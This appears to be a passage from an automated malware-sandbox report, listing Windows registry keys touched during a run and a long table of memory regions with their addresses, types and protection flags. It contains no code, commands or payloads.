HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.102
|
CheckSetting
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
|
LastUpdate
|
There are 36 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
3550000
|
unclassified section
|
page execute and read and write
|
|
|
|
3580000
|
trusted library allocation
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
2F30000
|
system
|
page execute and read and write
|
|
|
|
7FF5D1CCD000
|
unkown
|
page readonly
|
||
|
4FC0000
|
trusted library allocation
|
page read and write
|
||
|
A364000
|
unkown
|
page read and write
|
||
|
7FF5ED6BA000
|
unkown
|
page readonly
|
||
|
58A3000
|
unclassified section
|
page read and write
|
||
|
982D000
|
unkown
|
page read and write
|
||
|
7FF5ED5CE000
|
unkown
|
page readonly
|
||
|
1DC405C7000
|
trusted library allocation
|
page read and write
|
||
|
7CA0000
|
unkown
|
page read and write
|
||
|
7FF5EDA14000
|
unkown
|
page readonly
|
||
|
F464000
|
unkown
|
page read and write
|
||
|
7FF5ED7E0000
|
unkown
|
page readonly
|
||
|
37AE000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
C964000
|
unkown
|
page read and write
|
||
|
7FF5ED6DB000
|
unkown
|
page readonly
|
||
|
1D6672BA000
|
heap
|
page read and write
|
||
|
7FF5ED507000
|
unkown
|
page readonly
|
||
|
7FF5ED412000
|
unkown
|
page readonly
|
||
|
3700000
|
unkown
|
page read and write
|
||
|
6224000
|
heap
|
page read and write
|
||
|
1DC3E2F6000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
AB5D000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
32ED000
|
heap
|
page read and write
|
||
|
1DC400DF000
|
trusted library allocation
|
page read and write
|
||
|
9893000
|
unkown
|
page read and write
|
||
|
32FC000
|
heap
|
page read and write
|
||
|
C51E000
|
unkown
|
page read and write
|
||
|
21D000
|
stack
|
page read and write
|
||
|
C544000
|
unkown
|
page read and write
|
||
|
37BD000
|
unkown
|
page read and write
|
||
|
54281FF000
|
stack
|
page read and write
|
||
|
37AE000
|
unkown
|
page read and write
|
||
|
4BC9000
|
unkown
|
page read and write
|
||
|
7E50000
|
unkown
|
page readonly
|
||
|
97AD000
|
unkown
|
page read and write
|
||
|
7FF5ED476000
|
unkown
|
page readonly
|
||
|
7FF5ED844000
|
unkown
|
page readonly
|
||
|
7FF5ED503000
|
unkown
|
page readonly
|
||
|
986F000
|
unkown
|
page read and write
|
||
|
1D666A2E000
|
heap
|
page read and write
|
||
|
2FA0000
|
trusted library allocation
|
page read and write
|
||
|
1D666A24000
|
heap
|
page read and write
|
||
|
7FF5ED3D6000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7DF4F3041000
|
unkown
|
page execute read
|
||
|
9DED000
|
stack
|
page read and write
|
||
|
BDC0000
|
unkown
|
page readonly
|
||
|
4EB0000
|
heap
|
page read and write
|
||
|
B8B0000
|
unkown
|
page read and write
|
||
|
3800000
|
unkown
|
page readonly
|
||
|
1D667668000
|
heap
|
page read and write
|
||
|
4CE0000
|
unkown
|
page read and write
|
||
|
3390000
|
heap
|
page read and write
|
||
|
7FF5ED4EF000
|
unkown
|
page readonly
|
||
|
9977000
|
unkown
|
page read and write
|
||
|
7FF5ED418000
|
unkown
|
page readonly
|
||
|
C030DFE000
|
stack
|
page read and write
|
||
|
DD0000
|
unkown
|
page readonly
|
||
|
8730000
|
unkown
|
page read and write
|
||
|
7FFD9B6ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
BD98000
|
stack
|
page read and write
|
||
|
1D6675F6000
|
heap
|
page read and write
|
||
|
3379000
|
heap
|
page read and write
|
||
|
B629000
|
stack
|
page read and write
|
||
|
1DC3E067000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
1DC583FC000
|
heap
|
page read and write
|
||
|
B150000
|
unkown
|
page read and write
|
||
|
7FF5ED449000
|
unkown
|
page readonly
|
||
|
7FF5ED337000
|
unkown
|
page readonly
|
||
|
29F06F63000
|
trusted library allocation
|
page read and write
|
||
|
1DC4012C000
|
trusted library allocation
|
page read and write
|
||
|
12EF000
|
stack
|
page read and write
|
||
|
C243B3E000
|
stack
|
page read and write
|
||
|
7F30000
|
unkown
|
page read and write
|
||
|
A494000
|
unkown
|
page read and write
|
||
|
7FF5EDA69000
|
unkown
|
page readonly
|
||
|
7FF5ED7D6000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D66768D000
|
heap
|
page read and write
|
||
|
37A0000
|
unkown
|
page read and write
|
||
|
10C0000
|
unkown
|
page readonly
|
||
|
7FF5ED7E9000
|
unkown
|
page readonly
|
||
|
32F6000
|
heap
|
page read and write
|
||
|
9873000
|
unkown
|
page read and write
|
||
|
7FF5ED937000
|
unkown
|
page readonly
|
||
|
7FF5ED286000
|
unkown
|
page readonly
|
||
|
C503000
|
unkown
|
page read and write
|
||
|
AAF9000
|
unkown
|
page read and write
|
||
|
96DF000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
A01D000
|
stack
|
page read and write
|
||
|
1DC582E0000
|
heap
|
page read and write
|
||
|
3210000
|
unkown
|
page read and write
|
||
|
7FF5ED9ED000
|
unkown
|
page readonly
|
||
|
C5A0000
|
unkown
|
page read and write
|
||
|
C6D8000
|
unkown
|
page read and write
|
||
|
C49E000
|
stack
|
page read and write
|
||
|
9869000
|
unkown
|
page read and write
|
||
|
B43E000
|
system
|
page execute and read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1D667460000
|
heap
|
page read and write
|
||
|
7869000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
F4E6000
|
unkown
|
page read and write
|
||
|
ED3000
|
unclassified section
|
page execute and read and write
|
||
|
CA7C000
|
unkown
|
page read and write
|
||
|
1D667330000
|
heap
|
page read and write
|
||
|
E92E000
|
unkown
|
page execute and read and write
|
||
|
7F2E000
|
stack
|
page read and write
|
||
|
9F1E000
|
stack
|
page read and write
|
||
|
7CE0000
|
unkown
|
page read and write
|
||
|
BAF9000
|
stack
|
page read and write
|
||
|
37F2000
|
unkown
|
page read and write
|
||
|
1D664C49000
|
heap
|
page read and write
|
||
|
B140000
|
unkown
|
page readonly
|
||
|
1D6669FF000
|
heap
|
page read and write
|
||
|
7F30000
|
unkown
|
page read and write
|
||
|
7A34000
|
unkown
|
page read and write
|
||
|
1D6672DD000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED342000
|
unkown
|
page readonly
|
||
|
4B8B000
|
unkown
|
page read and write
|
||
|
7FF5ED6DB000
|
unkown
|
page readonly
|
||
|
C5AA000
|
unkown
|
page read and write
|
||
|
8000000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
C846000
|
unkown
|
page read and write
|
||
|
7FF5ED1CF000
|
unkown
|
page readonly
|
||
|
29F03ABA000
|
heap
|
page read and write
|
||
|
B170000
|
unkown
|
page readonly
|
||
|
1D66734D000
|
heap
|
page read and write
|
||
|
1DC3FFC1000
|
trusted library allocation
|
page read and write
|
||
|
9883000
|
unkown
|
page read and write
|
||
|
1210000
|
unkown
|
page readonly
|
||
|
C24383F000
|
stack
|
page read and write
|
||
|
290D6970000
|
heap
|
page read and write
|
||
|
1DC581BF000
|
heap
|
page read and write
|
||
|
37F6000
|
unkown
|
page read and write
|
||
|
29F07963000
|
trusted library allocation
|
page read and write
|
||
|
1D66769A000
|
heap
|
page read and write
|
||
|
C6F8000
|
unkown
|
page read and write
|
||
|
BDD0000
|
unkown
|
page readonly
|
||
|
1D666A02000
|
heap
|
page read and write
|
||
|
CB20000
|
unkown
|
page read and write
|
||
|
AF0C000
|
stack
|
page read and write
|
||
|
7FFE000
|
stack
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
4C18000
|
unkown
|
page read and write
|
||
|
11EF000
|
stack
|
page read and write
|
||
|
4D8D000
|
heap
|
page read and write
|
||
|
9885000
|
unkown
|
page read and write
|
||
|
88EE000
|
stack
|
page read and write
|
||
|
982D000
|
unkown
|
page read and write
|
||
|
9A5B000
|
unkown
|
page read and write
|
||
|
DE0000
|
unkown
|
page readonly
|
||
|
B140000
|
unkown
|
page readonly
|
||
|
CA63000
|
unkown
|
page read and write
|
||
|
7FF5ED9C6000
|
unkown
|
page readonly
|
||
|
1D667337000
|
heap
|
page read and write
|
||
|
29F0A0E6000
|
trusted library allocation
|
page read and write
|
||
|
1DC400DC000
|
trusted library allocation
|
page read and write
|
||
|
F562000
|
unkown
|
page read and write
|
||
|
1D66752A000
|
heap
|
page read and write
|
||
|
7FF5ED669000
|
unkown
|
page readonly
|
||
|
7FF5ED9B8000
|
unkown
|
page readonly
|
||
|
7FFD9B79C000
|
trusted library allocation
|
page execute and read and write
|
||
|
9B5B000
|
stack
|
page read and write
|
||
|
7FF5ED71B000
|
unkown
|
page readonly
|
||
|
7E60000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1DC3E0A9000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1DC3E097000
|
heap
|
page read and write
|
||
|
7FF5D1CD4000
|
unkown
|
page readonly
|
||
|
56D9000
|
unkown
|
page read and write
|
||
|
7867000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
9B60000
|
unkown
|
page readonly
|
||
|
E0000
|
system
|
page execute and read and write
|
||
|
7FF5ED5F7000
|
unkown
|
page readonly
|
||
|
1D66752A000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
4DB6000
|
heap
|
page read and write
|
||
|
C6CF000
|
unkown
|
page read and write
|
||
|
F4A3000
|
unkown
|
page read and write
|
||
|
987D000
|
unkown
|
page read and write
|
||
|
7D00000
|
unkown
|
page readonly
|
||
|
7FF5ED476000
|
unkown
|
page readonly
|
||
|
29F0B731000
|
trusted library allocation
|
page read and write
|
||
|
4BE1000
|
unkown
|
page read and write
|
||
|
1DC40533000
|
trusted library allocation
|
page read and write
|
||
|
8B60000
|
unkown
|
page readonly
|
||
|
7C80000
|
unkown
|
page read and write
|
||
|
542837E000
|
stack
|
page read and write
|
||
|
1D6669D1000
|
heap
|
page read and write
|
||
|
379E000
|
unkown
|
page read and write
|
||
|
7FF5ED644000
|
unkown
|
page readonly
|
||
|
7FFD9B6E4000
|
trusted library allocation
|
page read and write
|
||
|
1D666A24000
|
heap
|
page read and write
|
||
|
7FF5EDA76000
|
unkown
|
page readonly
|
||
|
33B9000
|
stack
|
page read and write
|
||
|
7CE0000
|
unkown
|
page read and write
|
||
|
4BDC000
|
unkown
|
page read and write
|
||
|
A361000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
965C000
|
stack
|
page read and write
|
||
|
7FF5ED4B0000
|
unkown
|
page readonly
|
||
|
7C90000
|
unkown
|
page read and write
|
||
|
8210000
|
unkown
|
page read and write
|
||
|
7FF5ED755000
|
unkown
|
page readonly
|
||
|
542817D000
|
stack
|
page read and write
|
||
|
7FF5ED9C8000
|
unkown
|
page readonly
|
||
|
32EB000
|
heap
|
page read and write
|
||
|
7FF5ED68F000
|
unkown
|
page readonly
|
||
|
7FF5ED8E7000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
A49E000
|
unkown
|
page read and write
|
||
|
CFB000
|
stack
|
page read and write
|
||
|
1D6672DE000
|
heap
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
C5A0000
|
unkown
|
page read and write
|
||
|
54282FE000
|
stack
|
page read and write
|
||
|
1D667360000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1DC5814C000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D66755E000
|
heap
|
page read and write
|
||
|
7FF5EDA11000
|
unkown
|
page readonly
|
||
|
7FF5ED55F000
|
unkown
|
page readonly
|
||
|
E8B000
|
unclassified section
|
page execute and read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7E60000
|
unkown
|
page read and write
|
||
|
7847000
|
unkown
|
page read and write
|
||
|
4B56000
|
unkown
|
page read and write
|
||
|
1D664CA7000
|
heap
|
page read and write
|
||
|
36D3000
|
stack
|
page read and write
|
||
|
AA90000
|
unkown
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF5ED26E000
|
unkown
|
page readonly
|
||
|
AB05000
|
unkown
|
page read and write
|
||
|
7FF5ED5C1000
|
unkown
|
page readonly
|
||
|
A4AB000
|
unkown
|
page read and write
|
||
|
3430000
|
heap
|
page read and write
|
||
|
B650000
|
unkown
|
page read and write
|
||
|
1D667326000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
EF0000
|
heap
|
page read and write
|
||
|
1D666570000
|
heap
|
page read and write
|
||
|
1601000
|
direct allocation
|
page execute and read and write
|
||
|
35A0000
|
unkown
|
page readonly
|
||
|
3550000
|
trusted library allocation
|
page read and write
|
||
|
97D4000
|
unkown
|
page read and write
|
||
|
7FF5ED46E000
|
unkown
|
page readonly
|
||
|
1483000
|
heap
|
page read and write
|
||
|
1D6672C6000
|
heap
|
page read and write
|
||
|
E59D000
|
stack
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7867000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
9875000
|
unkown
|
page read and write
|
||
|
7FF5ED2A4000
|
unkown
|
page readonly
|
||
|
1D6676A1000
|
heap
|
page read and write
|
||
|
7FF5ED85F000
|
unkown
|
page readonly
|
||
|
1D66752A000
|
heap
|
page read and write
|
||
|
35D0000
|
heap
|
page read and write
|
||
|
C857000
|
unkown
|
page read and write
|
||
|
7FF5ED850000
|
unkown
|
page readonly
|
||
|
10A60000
|
unkown
|
page read and write
|
||
|
7FF5ED81B000
|
unkown
|
page readonly
|
||
|
4B90000
|
unkown
|
page read and write
|
||
|
1DC40545000
|
trusted library allocation
|
page read and write
|
||
|
7FF5ED426000
|
unkown
|
page readonly
|
||
|
C92D000
|
unkown
|
page read and write
|
||
|
C4A0000
|
unkown
|
page read and write
|
||
|
7FF5ED8AC000
|
unkown
|
page readonly
|
||
|
33B9000
|
stack
|
page read and write
|
||
|
7FF5ED55F000
|
unkown
|
page readonly
|
||
|
7FF5ED62F000
|
unkown
|
page readonly
|
||
|
7FF5ED864000
|
unkown
|
page readonly
|
||
|
29F03A3F000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
D7E000
|
stack
|
page read and write
|
||
|
11B0000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
2FA0000
|
trusted library allocation
|
page read and write
|
||
|
29F03A17000
|
heap
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
1D666A24000
|
heap
|
page read and write
|
||
|
7FF5ED7E9000
|
unkown
|
page readonly
|
||
|
29F05430000
|
heap
|
page read and write
|
||
|
1D666B80000
|
remote allocation
|
page read and write
|
||
|
7FF5ED2A4000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1391000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
1480000
|
heap
|
page read and write
|
||
|
7FF5EDA69000
|
unkown
|
page readonly
|
||
|
7D40000
|
unkown
|
page read and write
|
||
|
7E11000
|
unkown
|
page read and write
|
||
|
29F039F8000
|
heap
|
page read and write
|
||
|
B728000
|
stack
|
page read and write
|
||
|
C512000
|
unkown
|
page read and write
|
||
|
78AD000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
4CB0000
|
unkown
|
page read and write
|
||
|
1D667519000
|
heap
|
page read and write
|
||
|
7FF5ED65C000
|
unkown
|
page readonly
|
||
|
7FF5ED3D0000
|
unkown
|
page readonly
|
||
|
1D6672C6000
|
heap
|
page read and write
|
||
|
89C0000
|
unkown
|
page read and write
|
||
|
29F03A51000
|
heap
|
page read and write
|
||
|
7FF5ED9CA000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
29F05330000
|
trusted library allocation
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1DC40410000
|
trusted library allocation
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
B640000
|
unkown
|
page read and write
|
||
|
9D64000
|
unkown
|
page read and write
|
||
|
686F000
|
stack
|
page read and write
|
||
|
2B7F000
|
heap
|
page read and write
|
||
|
7FF5ED33F000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1D6675BB000
|
heap
|
page read and write
|
||
|
1DC3E315000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D666A24000
|
heap
|
page read and write
|
||
|
2860000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
C8E1000
|
unkown
|
page read and write
|
||
|
B6A0000
|
heap
|
page read and write
|
||
|
1D66767B000
|
heap
|
page read and write
|
||
|
9873000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
C4D0000
|
unkown
|
page read and write
|
||
|
7FF5ED1CF000
|
unkown
|
page readonly
|
||
|
785B000
|
unkown
|
page read and write
|
||
|
7FF5ED586000
|
unkown
|
page readonly
|
||
|
4C50000
|
unkown
|
page read and write
|
||
|
7FF5ED28E000
|
unkown
|
page readonly
|
||
|
97C3000
|
unkown
|
page read and write
|
||
|
7FF5ED1CB000
|
unkown
|
page readonly
|
||
|
7FF5ED74A000
|
unkown
|
page readonly
|
||
|
7FF5ED43A000
|
unkown
|
page readonly
|
||
|
3797000
|
unkown
|
page read and write
|
||
|
F4E6000
|
unkown
|
page read and write
|
||
|
7861000
|
unkown
|
page read and write
|
||
|
29F03AE1000
|
heap
|
page read and write
|
||
|
7FF5ED41C000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
C544000
|
unkown
|
page read and write
|
||
|
7FF5ED97E000
|
unkown
|
page readonly
|
||
|
7F40000
|
unkown
|
page readonly
|
||
|
1D66735E000
|
heap
|
page read and write
|
||
|
62C0000
|
heap
|
page read and write
|
||
|
7FF5ED68C000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D664C9E000
|
heap
|
page read and write
|
||
|
7FF5ED1D6000
|
unkown
|
page readonly
|
||
|
1D667345000
|
heap
|
page read and write
|
||
|
8208000
|
stack
|
page read and write
|
||
|
7D53000
|
unkown
|
page read and write
|
||
|
7FF5ED471000
|
unkown
|
page readonly
|
||
|
AB5D000
|
unkown
|
page read and write
|
||
|
3385000
|
heap
|
page read and write
|
||
|
E820000
|
unkown
|
page execute and read and write
|
||
|
7DF4F3051000
|
unkown
|
page execute read
|
||
|
29F05436000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED8C1000
|
unkown
|
page readonly
|
||
|
1451000
|
unkown
|
page readonly
|
||
|
1DC4057A000
|
trusted library allocation
|
page read and write
|
||
|
A29E000
|
stack
|
page read and write
|
||
|
A21E000
|
stack
|
page read and write
|
||
|
4F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DC403BD000
|
trusted library allocation
|
page read and write
|
||
|
26E5000
|
direct allocation
|
page read and write
|
||
|
7FF5ED286000
|
unkown
|
page readonly
|
||
|
9550000
|
unkown
|
page readonly
|
||
|
34E9000
|
stack
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1200000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D664E8E000
|
heap
|
page read and write
|
||
|
1D66769E000
|
heap
|
page read and write
|
||
|
7FF5ED8AC000
|
unkown
|
page readonly
|
||
|
C08A000
|
stack
|
page read and write
|
||
|
4C50000
|
unkown
|
page read and write
|
||
|
7FF5ED445000
|
unkown
|
page readonly
|
||
|
7FF5ED97E000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
B5AE000
|
stack
|
page read and write
|
||
|
29F05801000
|
trusted library allocation
|
page read and write
|
||
|
C964000
|
unkown
|
page read and write
|
||
|
1D667262000
|
heap
|
page read and write
|
||
|
1DC403A4000
|
trusted library allocation
|
page read and write
|
||
|
29F0B879000
|
trusted library allocation
|
page read and write
|
||
|
7FF5ED3A7000
|
unkown
|
page readonly
|
||
|
7FF5ED7FD000
|
unkown
|
page readonly
|
||
|
7FF5D1CD4000
|
unkown
|
page readonly
|
||
|
131D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D666A1E000
|
heap
|
page read and write
|
||
|
C49E000
|
stack
|
page read and write
|
||
|
FF0000
|
heap
|
page read and write
|
||
|
7FF5ED8FF000
|
unkown
|
page readonly
|
||
|
C962000
|
unkown
|
page read and write
|
||
|
7FF5ED8C6000
|
unkown
|
page readonly
|
||
|
337C000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7FF5ED59C000
|
unkown
|
page readonly
|
||
|
9E6C000
|
stack
|
page read and write
|
||
|
29F039C0000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D6676A1000
|
heap
|
page read and write
|
||
|
7FF5ED3CE000
|
unkown
|
page readonly
|
||
|
36D3000
|
stack
|
page read and write
|
||
|
2FE5000
|
heap
|
page read and write
|
||
|
1230000
|
unkown
|
page read and write
|
||
|
FBDD000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7FF5ED8F9000
|
unkown
|
page readonly
|
||
|
7FF5ED505000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
29F03B70000
|
heap
|
page read and write
|
||
|
1800000
|
unclassified section
|
page execute and read and write
|
||
|
7CC0000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D6672BA000
|
heap
|
page read and write
|
||
|
1500000
|
heap
|
page read and write
|
||
|
9660000
|
unkown
|
page read and write
|
||
|
4CC0000
|
unkown
|
page read and write
|
||
|
1D667274000
|
heap
|
page read and write
|
||
|
C24377E000
|
stack
|
page read and write
|
||
|
7DF4F3051000
|
unkown
|
page execute read
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7F40000
|
unkown
|
page readonly
|
||
|
3758000
|
unkown
|
page read and write
|
||
|
7FF5ECED2000
|
unkown
|
page readonly
|
||
|
AB01000
|
unkown
|
page read and write
|
||
|
1D66735E000
|
heap
|
page read and write
|
||
|
C6BF000
|
unkown
|
page read and write
|
||
|
29F0AAE6000
|
trusted library allocation
|
page read and write
|
||
|
B8C0000
|
unkown
|
page readonly
|
||
|
3791000
|
unkown
|
page read and write
|
||
|
95DB000
|
stack
|
page read and write
|
||
|
1D667337000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
5062000
|
heap
|
page read and write
|
||
|
7FF5ED961000
|
unkown
|
page readonly
|
||
|
29F0C957000
|
trusted library allocation
|
page read and write
|
||
|
37A8000
|
unkown
|
page read and write
|
||
|
FBE6000
|
unkown
|
page read and write
|
||
|
A491000
|
unkown
|
page read and write
|
||
|
979C000
|
unkown
|
page read and write
|
||
|
1D664E8C000
|
heap
|
page read and write
|
||
|
10ED3000
|
system
|
page read and write
|
||
|
A433000
|
unkown
